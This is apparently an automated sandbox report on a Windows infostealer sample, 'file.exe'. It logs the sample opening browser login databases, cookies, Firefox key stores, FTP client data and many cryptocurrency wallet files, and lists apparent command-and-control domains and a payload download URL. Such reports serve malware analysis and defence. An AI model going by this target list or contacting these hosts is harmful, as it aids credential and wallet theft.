              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: C:\Users\user\Desktop\file.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
              Source: Yara matchFile source: 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2292290513.000000000104F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4784, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4784, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              12
              Process Injection
              34
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              761
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              12
              Process Injection
              LSASS Memory34
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol41
              Data from Local System
              11
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS1
              File and Directory Discovery
              Distributed Component Object ModelInput Capture114
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing
              LSA Secrets223
              System Information Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              file.exe32%ReversingLabsWin32.Trojan.Symmi
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://185.215.113.16/off/def.exeAppleWebKit/537.360%Avira URL Cloudsafe
              https://cook-rain.sbs/apiets/Jc100%Avira URL Cloudmalware
              https://cook-rain.sbs/C100%Avira URL Cloudmalware
              https://cook-rain.sbs:443/apisbs:443/apiMYTs9TuPk2hBT00xLEKwQAAAACPkwSk36IN4eV2I8M8fBfL2wa3R5ZlT6PUl100%Avira URL Cloudmalware
              https://cook-rain.sbs/api8100%Avira URL Cloudmalware
              https://cook-rain.sbs/V100%Avira URL Cloudmalware
              https://cook-rain.sbs:443/apiMYTs9TuPk2hBT00xLEKwQAAAACPkwSk36IN4eV2I8M8fBfL2wa3R5ZlT6PUlnjO6F2xxMfQ100%Avira URL Cloudmalware
              https://cook-rain.sbs/apiCJ100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0016.t-0009.t-msedge.net
              13.107.246.44
              truefalse
                high
                cook-rain.sbs
                188.114.97.3
                truefalse
                  high
                  s-part-0017.t-0009.t-msedge.net
                  13.107.246.45
                  truefalse
                    high
                    www.google.com
                    216.58.206.68
                    truefalse
                      high
                      ax-0001.ax-msedge.net
                      150.171.27.10
                      truefalse
                        high
                        js.monitor.azure.com
                        unknown
                        unknownfalse
                          high
                          mdec.nelreports.net
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://tse1.mm.bing.net/th?id=OADD2.10239351692182_1I6V30R2J66NF61KL&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                              high
                              peepburry828.sbsfalse
                                high
                                https://tse1.mm.bing.net/th?id=OADD2.10239402415510_1LQQ8WSBAXW97X0WT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                  high
                                  p10tgrace.sbsfalse
                                    high
                                    processhol.sbsfalse
                                      high
                                      https://cook-rain.sbs/apifalse
                                        high
                                        https://tse1.mm.bing.net/th?id=OADD2.10239339388108_1KZ6HVDK2OYWY9XA8&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90false
                                          high
                                          https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.jsfalse
                                            high
                                            https://tse1.mm.bing.net/th?id=OADD2.10239402456886_16PSERWAUMTCB5AWR&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                              high
                                              p3ar11fter.sbsfalse
                                                high
                                                https://tse1.mm.bing.net/th?id=OADD2.10239339388107_1RNTUVYHPUHJQ1IFH&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                  high
                                                  https://tse1.mm.bing.net/th?id=OADD2.10239351692183_1GSWAYG616F8PFDNZ&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90false
                                                    high
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cfchromecache_204.14.drfalse
                                                      high
                                                      http://185.215.113.16/off/def.exeAppleWebKit/537.36file.exe, 00000000.00000002.2561803967.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://cook-rain.sbs/api8file.exe, 00000000.00000003.2315857933.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2334321223.0000000005963000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://cook-rain.sbs/apiets/Jcfile.exe, 00000000.00000003.2292267592.00000000010BE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://cook-rain.sbs/Cfile.exe, 00000000.00000003.2321194871.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2472240288.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2473025092.00000000010B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/chromecache_204.14.drfalse
                                                            high
                                                            https://www.linkedin.com/cws/share?url=$chromecache_196.14.dr, chromecache_186.14.drfalse
                                                              high
                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/Youssef1313chromecache_204.14.drfalse
                                                                  high
                                                                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfile.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_196.14.dr, chromecache_186.14.drfalse
                                                                      high
                                                                      https://aka.ms/msignite_docs_bannerchromecache_196.14.dr, chromecache_186.14.drfalse
                                                                        high
                                                                        https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_186.14.drfalse
                                                                          high
                                                                          http://polymer.github.io/AUTHORS.txtchromecache_196.14.dr, chromecache_186.14.drfalse
                                                                            high
                                                                            https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_204.14.drfalse
                                                                              high
                                                                              https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                high
                                                                                https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_204.14.drfalse
                                                                                  high
                                                                                  http://x1.c.lencr.org/0file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://x1.i.lencr.org/0file.exe, 00000000.00000003.2263066344.00000000059AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://aka.ms/pshelpmechoosechromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                        high
                                                                                        https://aka.ms/feedback/report?space=61chromecache_204.14.dr, chromecache_205.14.dr, chromecache_171.14.drfalse
                                                                                          high
                                                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://learn-video.azurefd.net/vod/playerchromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                              high
                                                                                              https://twitter.com/intent/tweet?original_referer=$chromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                                high
                                                                                                https://github.com/gewarrenchromecache_204.14.drfalse
                                                                                                  high
                                                                                                  https://cook-rain.sbs/Vfile.exe, 00000000.00000003.2321194871.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.00000000010B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: malware
                                                                                                  unknown
                                                                                                  https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2264718193.0000000005A86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://polymer.github.io/CONTRIBUTORS.txtchromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                                      high
                                                                                                      https://www.mozilla.orfile.exe, 00000000.00000003.2265216591.00000000059AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_204.14.drfalse
                                                                                                          high
                                                                                                          https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_204.14.drfalse
                                                                                                            high
                                                                                                            https://client-api.arkoselabs.com/v2/api.jschromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                                              high
                                                                                                              https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                                                high
                                                                                                                https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_196.14.dr, chromecache_186.14.drfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2213941867.00000000059AC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213583521.00000000059AE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2213783025.00000000059AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://github.com/Thrakachromecache_204.14.drfalse
                                                                                                                      high
                                                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2265449881.000000000596E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2265562675.0000000005971000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
